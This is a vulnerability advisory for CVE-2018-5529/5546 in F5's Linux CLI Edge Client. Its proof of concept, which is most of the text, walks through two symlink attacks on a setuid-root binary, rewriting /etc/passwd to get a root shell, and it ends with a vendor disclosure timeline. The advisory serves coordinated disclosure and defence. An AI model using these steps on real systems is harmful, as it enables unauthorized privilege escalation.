CVE-2018-5529.txt
Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (original issue; the fix in 7.1.7 was incomplete),
CVE-2018-5546 (incomplete fix)
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package is
setuid root and changes the ownership and permissions of several files and
directories under $HOME/.F5Networks without first dropping to the invoking
user's privileges. This allows local unprivileged users to obtain ownership
of arbitrary files via vectors involving creation of a directory and a file
under that directory, and later replacing that directory or file with a
symlink.
Notes:
1. The PoC below is for Linux; macOS is also vulnerable. On macOS the svpn
binary is named differently and stored in a different directory.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary, which is setuid root.
In both cases the binary operates on a path under $HOME that the invoking
user controls while its effective UID is still 0, so the kernel follows
whatever symlink the user has placed there:
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create $HOME/.F5Networks as a symlink pointing to /etc.
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change the UID/GID of user1 to 0. user1 still
does not own /etc/passwd itself, but owning /etc is enough to rename it and
create a replacement copy that user1 owns.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 (authenticating with user1's own password)
and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create $HOME/.F5Networks/svpn.log as a symlink pointing to /etc/passwd.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice that svpn's own log output has
been appended to it: the binary opened $HOME/.F5Networks/svpn.log for append
while still running as root, so the write followed the symlink (the file grew
from 929 to 2385 bytes).
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546